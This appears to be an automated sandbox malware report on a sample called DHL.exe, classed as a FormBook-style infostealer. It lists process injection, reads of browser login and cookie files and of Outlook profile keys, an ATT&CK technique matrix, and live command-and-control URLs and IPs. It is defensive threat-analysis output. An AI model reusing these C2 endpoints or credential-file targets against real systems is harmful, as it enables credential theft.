                Source: eYHtcsfFquWF.exe, 00000004.00000000.1627664270.0000000001100000.00000002.00000001.00040000.00000000.sdmp, eYHtcsfFquWF.exe, 00000004.00000002.2708787762.0000000001100000.00000002.00000001.00040000.00000000.sdmp, eYHtcsfFquWF.exe, 00000006.00000000.1781545042.0000000001121000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: eYHtcsfFquWF.exe, 00000004.00000000.1627664270.0000000001100000.00000002.00000001.00040000.00000000.sdmp, eYHtcsfFquWF.exe, 00000004.00000002.2708787762.0000000001100000.00000002.00000001.00040000.00000000.sdmp, eYHtcsfFquWF.exe, 00000006.00000000.1781545042.0000000001121000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 0Program Manager
                Source: eYHtcsfFquWF.exe, 00000004.00000000.1627664270.0000000001100000.00000002.00000001.00040000.00000000.sdmp, eYHtcsfFquWF.exe, 00000004.00000002.2708787762.0000000001100000.00000002.00000001.00040000.00000000.sdmp, eYHtcsfFquWF.exe, 00000006.00000000.1781545042.0000000001121000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009C0698 cpuid 0_2_009C0698
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A18195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00A18195
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009FD27A GetUserNameW,0_2_009FD27A
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009DB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_009DB952
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_009A42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009A42DE

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2710446513.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2712813686.0000000005030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2710629488.0000000004610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2700411137.0000000002850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1707823352.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1707521744.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1708319650.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2709918624.0000000003CB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\wiaacmgr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\wiaacmgr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: DHL.exeBinary or memory string: WIN_81
                Source: DHL.exeBinary or memory string: WIN_XP
                Source: DHL.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: DHL.exeBinary or memory string: WIN_XPe
                Source: DHL.exeBinary or memory string: WIN_VISTA
                Source: DHL.exeBinary or memory string: WIN_7
                Source: DHL.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.2710446513.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2712813686.0000000005030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2710629488.0000000004610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2700411137.0000000002850000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1707823352.0000000003300000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1707521744.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1708319650.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2709918624.0000000003CB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A21204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00A21204
                Source: C:\Users\user\Desktop\DHL.exeCode function: 0_2_00A21806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00A21806
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                1
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets241
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials12
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576518 Sample: DHL.exe Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 28 www.startsomething.xyz 2->28 30 www.juewucangku.xyz 2->30 32 7 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 DHL.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Found API chain indicative of sandbox detection 10->64 66 Writes to foreign memory regions 10->66 68 2 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 eYHtcsfFquWF.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 wiaacmgr.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 eYHtcsfFquWF.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.startsomething.xyz 69.57.163.64, 49727, 49728, 49729 FORTRESSITXUS United States 22->34 36 187370.github.io 185.199.110.153, 49709, 49710, 49711 FASTLYUS Netherlands 22->36 38 4 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                DHL.exe29%VirustotalBrowse
                DHL.exe42%ReversingLabsWin32.Trojan.AutoitInject
                DHL.exe100%AviraHEUR/AGEN.1319493
                DHL.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.startsomething.xyz/9er8/?rPh=y0ZQaQGYytoPYKDdgLZSit2uqdIxJa9e7dCpW1aT2gUHtttnVaZ37Rd6tJxE+MMiCUIjuSyOnxmaU3U+fVZaaX16+D89AnEZm+xwCYUrhMUvMxACYJDUe5GKortKSbmbEQ==&kVvpD=Bx4T0%Avira URL Cloudsafe
                http://www.ausyva4.top/al74/?rPh=1Bjse4aauCmo97N7IjLs1t9/5DytV/tAUwTJU6u6E0%Avira URL Cloudsafe
                https://www.juewucangku.xyz/b6bc/?rPh=xoBYbUYuit1npWAwAtyehE3iQkiUZWMjRZPyJ7i/hpkEutNt4jOTaw6JRAgW2l0%Avira URL Cloudsafe
                http://www.pku-cs-cjw.top/k3hn/0%Avira URL Cloudsafe
                http://www.startsomething.xyz0%Avira URL Cloudsafe
                http://www.ausyva4.top/al74/0%Avira URL Cloudsafe
                http://www.969-usedcar02.shop/cfcv/?rPh=yFDcd28s49uqEHKp5gxZDHehDMkbx8O5HFlFfS4Td0kedo/+sd9J73ZTBpR3wC1xC+DY+jWyDKbAELqR1mf/RFpqWmAJN7Naqf7NuMxlktjiSvXKA5GjZW5lR8Lr/Dnajw==&kVvpD=Bx4T0%Avira URL Cloudsafe
                http://www.juewucangku.xyz/b6bc/?rPh=xoBYbUYuit1npWAwAtyehE3iQkiUZWMjRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC4HeAxlwjpiSK9Zc7LnKUA0uykY2c1YtOuNjF0odUunu7vTTMkkGOdpFXJ3f6l6FBu5A==&kVvpD=Bx4T0%Avira URL Cloudsafe
                http://www.969-usedcar02.shop/cfcv/0%Avira URL Cloudsafe
                http://www.ausyva4.top/al74/?rPh=1Bjse4aauCmo97N7IjLs1t9/5DytV/tAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4otrEVDu/SUiQI/oGzb8PpnvlDT2bJ+R5Sn1ObiYbGTGLsy9HRXwDQ==&kVvpD=Bx4T0%Avira URL Cloudsafe
                http://www.startsomething.xyz/9er8/0%Avira URL Cloudsafe
                http://www.pku-cs-cjw.top/k3hn/?rPh=dZddn2QnmIt3Z4tuH0E3g34XkYAItSNhr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ9Hdmeil28QjfyJs81mcvpy2JTiV0mNzD6MbLs+vdIgTAzo2XEDLCKFuL/iGeag==&kVvpD=Bx4T0%Avira URL Cloudsafe
                http://www.juewucangku.xyz/b6bc/0%Avira URL Cloudsafe
                http://www.goldbracelet.top/3e00/?rPh=vcWi2Nuzfs8bFUYEQnXoBGbuOVlE2i7vXXwcNv5UqJ4W+nqlyarjJ+7bYKIWgHEnmSKdgKCrspLX0t5o9qCKhlhB0ucBfa9KdBCtjbE5oHHxOp6OdcL90Ef3I2JAzosFGA==&kVvpD=Bx4T0%Avira URL Cloudsafe
                http://pku-cs-cjw.top/k3hn/?rPh=dZddn2QnmIt3Z4tuH0E3g34XkYAItSNhr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                www.969-usedcar02.shop
                199.59.243.227
                truetrue
                  unknown
                  www.goldbracelet.top
                  104.21.36.239
                  truefalse
                    unknown
                    www.ausyva4.top
                    104.21.48.233
                    truetrue
                      unknown
                      overdue.aliyun.com
                      170.33.13.246
                      truefalse
                        high
                        187370.github.io
                        185.199.110.153
                        truetrue
                          unknown
                          www.juewucangku.xyz
                          8.136.96.106
                          truetrue
                            unknown
                            www.startsomething.xyz
                            69.57.163.64
                            truetrue
                              unknown
                              www.pku-cs-cjw.top
                              unknown
                              unknownfalse
                                unknown
                                www.opro.vip
                                unknown
                                unknownfalse
                                  unknown
                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.ausyva4.top/al74/true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.969-usedcar02.shop/cfcv/?rPh=yFDcd28s49uqEHKp5gxZDHehDMkbx8O5HFlFfS4Td0kedo/+sd9J73ZTBpR3wC1xC+DY+jWyDKbAELqR1mf/RFpqWmAJN7Naqf7NuMxlktjiSvXKA5GjZW5lR8Lr/Dnajw==&kVvpD=Bx4Ttrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.969-usedcar02.shop/cfcv/true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.startsomething.xyz/9er8/?rPh=y0ZQaQGYytoPYKDdgLZSit2uqdIxJa9e7dCpW1aT2gUHtttnVaZ37Rd6tJxE+MMiCUIjuSyOnxmaU3U+fVZaaX16+D89AnEZm+xwCYUrhMUvMxACYJDUe5GKortKSbmbEQ==&kVvpD=Bx4Ttrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.juewucangku.xyz/b6bc/?rPh=xoBYbUYuit1npWAwAtyehE3iQkiUZWMjRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lC4HeAxlwjpiSK9Zc7LnKUA0uykY2c1YtOuNjF0odUunu7vTTMkkGOdpFXJ3f6l6FBu5A==&kVvpD=Bx4Ttrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.pku-cs-cjw.top/k3hn/true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.ausyva4.top/al74/?rPh=1Bjse4aauCmo97N7IjLs1t9/5DytV/tAUwTJU6u6E+Bhsof6UHxdy2RqbyRgtbt7gLKPghU8oqnr4otrEVDu/SUiQI/oGzb8PpnvlDT2bJ+R5Sn1ObiYbGTGLsy9HRXwDQ==&kVvpD=Bx4Ttrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.juewucangku.xyz/b6bc/true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.startsomething.xyz/9er8/true
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.pku-cs-cjw.top/k3hn/?rPh=dZddn2QnmIt3Z4tuH0E3g34XkYAItSNhr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ9Hdmeil28QjfyJs81mcvpy2JTiV0mNzD6MbLs+vdIgTAzo2XEDLCKFuL/iGeag==&kVvpD=Bx4Ttrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.goldbracelet.top/3e00/?rPh=vcWi2Nuzfs8bFUYEQnXoBGbuOVlE2i7vXXwcNv5UqJ4W+nqlyarjJ+7bYKIWgHEnmSKdgKCrspLX0t5o9qCKhlhB0ucBfa9KdBCtjbE5oHHxOp6OdcL90Ef3I2JAzosFGA==&kVvpD=Bx4Tfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabwiaacmgr.exe, 00000005.00000003.1902651783.0000000007A8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://www.ausyva4.top/al74/?rPh=1Bjse4aauCmo97N7IjLs1t9/5DytV/tAUwTJU6u6Ewiaacmgr.exe, 00000005.00000002.2712106181.0000000005588000.00000004.10000000.00040000.00000000.sdmp, eYHtcsfFquWF.exe, 00000006.00000002.2711108756.0000000003308000.00000004.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://duckduckgo.com/ac/?q=wiaacmgr.exe, 00000005.00000003.1902651783.0000000007A8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icowiaacmgr.exe, 00000005.00000003.1902651783.0000000007A8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://www.juewucangku.xyz/b6bc/?rPh=xoBYbUYuit1npWAwAtyehE3iQkiUZWMjRZPyJ7i/hpkEutNt4jOTaw6JRAgW2lwiaacmgr.exe, 00000005.00000002.2712106181.00000000058AC000.00000004.10000000.00040000.00000000.sdmp, eYHtcsfFquWF.exe, 00000006.00000002.2711108756.000000000362C000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.startsomething.xyzeYHtcsfFquWF.exe, 00000006.00000002.2712813686.00000000050E4000.00000040.80000000.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=wiaacmgr.exe, 00000005.00000003.1902651783.0000000007A8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=wiaacmgr.exe, 00000005.00000003.1902651783.0000000007A8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://www.ecosia.org/newtab/wiaacmgr.exe, 00000005.00000003.1902651783.0000000007A8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://ac.ecosia.org/autocomplete?q=wiaacmgr.exe, 00000005.00000003.1902651783.0000000007A8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://www.google.comwiaacmgr.exe, 00000005.00000002.2712106181.000000000571A000.00000004.10000000.00040000.00000000.sdmp, wiaacmgr.exe, 00000005.00000002.2713669161.0000000007730000.00000004.00000800.00020000.00000000.sdmp, eYHtcsfFquWF.exe, 00000006.00000002.2711108756.000000000349A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  high
                                                  http://pku-cs-cjw.top/k3hn/?rPh=dZddn2QnmIt3Z4tuH0E3g34XkYAItSNhr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJwiaacmgr.exe, 00000005.00000002.2712106181.00000000053F6000.00000004.10000000.00040000.00000000.sdmp, eYHtcsfFquWF.exe, 00000006.00000002.2711108756.0000000003176000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwiaacmgr.exe, 00000005.00000003.1902651783.0000000007A8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=wiaacmgr.exe, 00000005.00000003.1902651783.0000000007A8D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      8.136.96.106
                                                      www.juewucangku.xyzSingapore
                                                      37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                                      69.57.163.64
                                                      www.startsomething.xyzUnited States
                                                      25653FORTRESSITXUStrue
                                                      104.21.36.239
                                                      www.goldbracelet.topUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      104.21.48.233
                                                      www.ausyva4.topUnited States
                                                      13335CLOUDFLARENETUStrue
                                                      199.59.243.227
                                                      www.969-usedcar02.shopUnited States
                                                      395082BODIS-NJUStrue
                                                      185.199.110.153
                                                      187370.github.ioNetherlands
                                                      54113FASTLYUStrue
                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1576518
                                                      Start date and time:2024-12-17 08:22:13 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 8m 43s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:10
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:2
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:DHL.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@7/3@9/6
                                                      EGA Information:
                                                      • Successful, ratio: 75%
                                                      HCA Information:
                                                      • Successful, ratio: 90%
                                                      • Number of executed functions: 43
                                                      • Number of non-executed functions: 304
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                      • Excluded IPs from analysis (whitelisted): 52.149.20.212
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      TimeTypeDescription
                                                      02:24:16API Interceptor2266586x Sleep call for process: wiaacmgr.exe modified
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      8.136.96.106Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                      • www.juewucangku.xyz/mia8/
                                                      69.57.163.64Salmebogs(1).exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.openhorizons.pro/ir2n/
                                                      104.21.36.239file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • www.goldbracelet.top/eln6/
                                                      199.59.243.227z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                      • www.sorket.tech/ul4e/
                                                      236236236.elfGet hashmaliciousUnknownBrowse
                                                      • survey-smiles.com/
                                                      HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                      • ww7.przvgke.biz/aikqer?usid=23&utid=8062768193
                                                      Payment Copy #190922-001.exeGet hashmaliciousFormBookBrowse
                                                      • www.deadshoy.tech/0sq9/
                                                      new.exeGet hashmaliciousFormBookBrowse
                                                      • www.vavada-official.buzz/emhd/
                                                      PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                      • www.sob.rip/tp8k/
                                                      SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                      • ww1.hbohbomax.com/
                                                      ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                      • www.deadshoy.tech/0sq9/
                                                      PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                      • ww7.przvgke.biz/cairvr?usid=18&utid=28672493914
                                                      Need Price Order No.17084 PARLOK.exeGet hashmaliciousFormBookBrowse
                                                      • www.solar-quotes.click/ubu8/
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      overdue.aliyun.comDocument.exeGet hashmaliciousFormBookBrowse
                                                      • 170.33.13.246
                                                      DPqKF5vqpe.exeGet hashmaliciousLummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SystemBCBrowse
                                                      • 170.33.13.246
                                                      file.exeGet hashmaliciousUnknownBrowse
                                                      • 170.33.13.246
                                                      BRvptajioG.exeGet hashmaliciousRedLine, SmokeLoader, StealcBrowse
                                                      • 170.33.13.246
                                                      Payment_Advice.exeGet hashmaliciousFormBookBrowse
                                                      • 170.33.13.246
                                                      SecuriteInfo.com.BackDoor.BlackHole.55951.25738.15896.exeGet hashmaliciousUnknownBrowse
                                                      • 170.33.13.246
                                                      SecuriteInfo.com.BackDoor.BlackHole.55951.25738.15896.exeGet hashmaliciousUnknownBrowse
                                                      • 170.33.13.246
                                                      file.exeGet hashmaliciousPhorpiex, XmrigBrowse
                                                      • 170.33.13.246
                                                      YSpCB8DEek.exeGet hashmaliciousFormBookBrowse
                                                      • 170.33.13.246
                                                      w8jII3Mlbs.exeGet hashmaliciousFormBookBrowse
                                                      • 170.33.96.51
                                                      www.goldbracelet.topPp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                      • 172.67.201.49
